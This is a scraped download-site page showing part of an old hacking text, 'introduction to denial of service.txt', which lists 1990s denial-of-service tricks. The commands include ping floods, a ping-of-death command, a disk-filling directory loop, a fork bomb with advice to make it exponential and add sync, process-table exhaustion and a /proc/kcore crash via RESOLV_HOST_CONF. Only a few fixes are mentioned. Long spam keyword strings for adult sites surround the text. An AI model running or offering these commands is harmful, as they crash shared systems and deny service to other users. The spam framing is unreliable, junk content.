亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? introduction to denial of service.txt

?? a collection of mega hacking tools
?? TXT
?? 第 1 頁 / 共 4 頁
字號:
	[.2.] http://jya.com/floodd.txt
	2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

	[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
	IP-spoofing Demystified by daemon9 / route / infinity
     	for Phrack Magazine

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets. 

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.


.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:
	
	$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.

Ex:

	$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.

Ex:

	while : ;
	mkdir .xxx
	cd .xxx
	done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:
 
	% eval '\!\!'
	
.D.5. MALICIOUS USE OF fork() 
-----------------------------

If someone executes this C++ program the result will result in a crash
on most systems.

Ex:
	
	#include <sys/types.h>
	#include <unistd.h>
	#include <iostream.h>
	
	main()
	{
		int x;
		while(x=0;x<1000000;x++)
			{
				system("uptime");
				fork();
			}
	}

You can use any command you want, but uptime is nice
because it shows the workload.

To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.

If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload. 

There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.

.D.6. CREATING FILES THAT IS HARD TO REMOVE
-------------------------------------------

Well all files can be removed, but here is some ideas:

Ex.I.

	$ cat > -xxx
	^C
	$ ls
	-xxx
	$ rm -xxx
	rm: illegal option -- x
	rm: illegal option -- x
	rm: illegal option -- x
	usage: rm [-fiRr] file ...
	$

Ex.II.

	$ touch xxx!
	$ rm xxx!
	rm: remove xxx! (yes/no)? y
	$ touch xxxxxxxxx!
	$ rm xxxxxxxxx!
	bash: !": event not found
	$

	(You see the size do count!)

Other well know methods is files with odd characters or spaces
in the name. 

These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./<filename>. It should work for
the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.
 
.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification) 
and the load level will get very high (that is 100% of the cpu time) 
in a very short time. 

Ex:

	|I /bin/csh
	nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is 
read in the variable and access through ping.

Ex:
	
	$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS	
----------------------------------

Thanks to Mr David Honig <honig@amada.net> for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the 
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT 
---------------------------------

ulimit is used to set a limit on the system resources available to the 
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the 
passwd file be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

	- arp_killcomplete 
	- arp_killincomplete
	- arp_unicast 
	- arp_rebroadcast
	- icmp_mask_agent
	- ip_defaultttl
	- ip_forwarding
	- ip_intrqmax
	- pmtu_defaulttime
	- tcp_localsubnets
	- tcp_receive
	- tcp_send
	- tcp_defaultttl
	- tcp_keepstart 
	- tcp_keepfreq
	- tcp_keepstop
	- tcp_maxretrans
	- tcp_urgent_data_ptr
	- udp_cksum
	- udp_defaultttl 
	- udp_newbcastenable 
	- udp_pmtu
	- tcp_pmtu
	- tcp_random_seq

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.


.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dumps things don't really belongs in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:

	<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

.E.3. CORE DUMPED UNDER WUFTPD
------------------------------

A core dumped could be created under wuftp with two different
methods:

	(1) Then pasv is given (user not logged in (ftp -n)). Almost all
	versions of BSD:s ftpd.
	(2) More than 100 arguments is given with any executable
	command. Presents in all versions of BSD:sd ftpd.

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
亚洲亚洲人成综合网络| 国产91精品一区二区麻豆网站| 日韩av在线发布| www.日韩av| 久久嫩草精品久久久精品一| 亚洲国产精品精华液网站| 国产91丝袜在线播放0| 91超碰这里只有精品国产| 日韩理论在线观看| 国产91丝袜在线播放0| 精品国产sm最大网站免费看| 亚洲综合色丁香婷婷六月图片| 成人影视亚洲图片在线| 欧美电影免费观看完整版| 亚洲综合精品自拍| 色天天综合色天天久久| 欧美极品aⅴ影院| 激情丁香综合五月| 精品国产a毛片| 精品在线观看视频| 精品国产乱码久久久久久老虎| 日本sm残虐另类| 欧美一区二区观看视频| 日本不卡的三区四区五区| 在线看不卡av| 一级特黄大欧美久久久| 色狠狠av一区二区三区| 亚洲欧美日韩综合aⅴ视频| 不卡一区在线观看| 国产精品狼人久久影院观看方式| 国产成人午夜电影网| 中文字幕在线一区免费| 国产精品一区二区三区99| 精品久久久久久久久久久院品网| 蜜桃精品视频在线| 精品少妇一区二区三区免费观看 | 国产露脸91国语对白| 欧美大片国产精品| 国产一区二区三区在线观看免费视频| 日韩欧美在线影院| 国产剧情av麻豆香蕉精品| 欧美国产日韩精品免费观看| 不卡影院免费观看| 一区二区欧美国产| 欧美精品丝袜久久久中文字幕| 免费成人结看片| 日本一区二区三区dvd视频在线| 国产成人免费视频网站高清观看视频| 国产欧美一区视频| 91福利在线看| 亚洲成人先锋电影| 久久你懂得1024| 色综合久久久久久久久| 日韩av中文字幕一区二区三区 | 韩国理伦片一区二区三区在线播放| 日韩一级黄色片| 国产成人精品午夜视频免费| 亚洲日本在线看| 91精品婷婷国产综合久久| 国产福利一区二区| 亚洲专区一二三| 久久久久9999亚洲精品| 91黄色在线观看| 精品在线亚洲视频| 一区二区三区在线视频免费观看| 制服丝袜国产精品| 不卡视频一二三| 人妖欧美一区二区| 亚洲色大成网站www久久九九| 欧美精品久久久久久久多人混战 | 久久亚洲精品国产精品紫薇| 99这里只有久久精品视频| 亚洲第一成年网| 中文字幕永久在线不卡| 欧美一区二区三区视频| 成人黄色电影在线| 久久不见久久见免费视频1| 最新久久zyz资源站| 日韩欧美的一区| 欧美日韩视频在线第一区| 国产成人av电影在线| 日本va欧美va瓶| 亚洲成人一区在线| 中文字幕佐山爱一区二区免费| 欧美日韩高清影院| 色综合中文字幕| 国产成人精品免费| 九九视频精品免费| 午夜亚洲国产au精品一区二区 | wwwwww.欧美系列| 色婷婷久久久亚洲一区二区三区| 国产69精品久久久久777| 男女性色大片免费观看一区二区 | 欧美日韩激情一区二区三区| 成人午夜电影小说| 国产一区二区三区高清播放| 日本不卡中文字幕| 亚洲一区二区三区自拍| 亚洲色图视频网站| 亚洲欧洲在线观看av| 国产精品视频看| 国产午夜精品一区二区三区四区| 日韩免费一区二区三区在线播放| 欧美日韩一区二区在线视频| 色狠狠色狠狠综合| 在线观看视频一区二区欧美日韩| 成人性视频免费网站| 大胆欧美人体老妇| 成人黄色在线网站| 99re6这里只有精品视频在线观看 99re8在线精品视频免费播放 | 久久久高清一区二区三区| 日韩欧美在线123| 日韩写真欧美这视频| 日韩三级视频中文字幕| 777精品伊人久久久久大香线蕉| 欧美影院精品一区| 欧美精品乱人伦久久久久久| 6080午夜不卡| 精品久久一区二区三区| 久久伊99综合婷婷久久伊| 久久综合九色综合久久久精品综合| 精品美女在线观看| 国产日韩三级在线| 最新热久久免费视频| 一区二区三区在线影院| 日韩精品每日更新| 久久99精品久久久久久国产越南 | 久久久www成人免费无遮挡大片| 久久一夜天堂av一区二区三区| 国产午夜精品美女毛片视频| 国产精品久久网站| 亚洲永久免费视频| 日韩电影免费在线观看网站| 狠狠色综合色综合网络| 国产成人8x视频一区二区| 91片在线免费观看| 欧美日韩午夜影院| 久久久久久久综合| 中文字幕一区二区三区不卡| 亚洲一区二区在线观看视频| 欧美a级理论片| 高清视频一区二区| 欧美久久久一区| 久久久亚洲高清| 夜夜嗨av一区二区三区| 免费看欧美美女黄的网站| 国产传媒日韩欧美成人| 欧美羞羞免费网站| 久久你懂得1024| 亚洲超丰满肉感bbw| 国产精品一品视频| 欧美日免费三级在线| 久久中文字幕电影| 亚洲风情在线资源站| 成人丝袜18视频在线观看| 欧美日韩国产精品自在自线| 国产午夜亚洲精品不卡| 经典一区二区三区| 在线观看91视频| 国产欧美日韩在线| 日本不卡一二三区黄网| 色偷偷成人一区二区三区91| 精品国产百合女同互慰| 亚洲电影欧美电影有声小说| 不卡影院免费观看| 精品国产a毛片| 日韩中文字幕一区二区三区| 91视频xxxx| 26uuu亚洲综合色| 同产精品九九九| 色综合久久久网| 欧美国产亚洲另类动漫| 精品一区二区三区视频在线观看 | 亚洲国产aⅴ天堂久久| 成人毛片视频在线观看| 精品日产卡一卡二卡麻豆| 亚洲电影第三页| 91麻豆6部合集magnet| 国产日韩欧美在线一区| 麻豆91在线播放免费| 欧美日韩小视频| 亚洲一区在线观看视频| 99久久久久久| 日本一区二区综合亚洲| 国产在线麻豆精品观看| 3d动漫精品啪啪一区二区竹菊| 亚洲精品国产成人久久av盗摄| 高清不卡在线观看av| 2020国产精品| 经典三级一区二区| 日韩精品资源二区在线| 日韩av高清在线观看| 7777精品久久久大香线蕉| 亚洲一区二区三区四区五区黄 | 青青草原综合久久大伊人精品 | 中文在线一区二区| 高清视频一区二区| 中文字幕乱码一区二区免费| 成人网页在线观看| 国产精品久线观看视频|